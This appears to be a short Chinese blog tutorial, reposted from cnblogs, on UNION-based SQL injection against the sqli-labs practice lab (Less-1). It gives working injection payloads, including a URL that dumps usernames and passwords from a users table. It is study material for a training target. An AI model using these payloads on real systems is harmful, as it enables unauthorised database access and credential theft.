在sql注入中我们通常会使用这样一条语句来爆破字段:
id=-1 union select 1,2,3 --+ 源代码: SELECT * FROM users WHERE id=-1 union select 1,2,3
假如表的字段是三个,他会根据程序的设定来输出哪个字段。如果这时使用键值对来查询,而不是数组标号,就会提出一个问题:根据键值对查询出的结果还会是后面的那个表的结果吗,结果当然是肯定的。
当前面的id=-1 ,即前一个select失效后,查询的键值对会依次输入后面查询的值
echo ‘Your Login name:‘. $row[‘username‘];
echo ‘Your Password:‘ .$row[‘password‘];
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1, password,username from users where id =2--+
原文:https://www.cnblogs.com/jokdh/p/14812935.html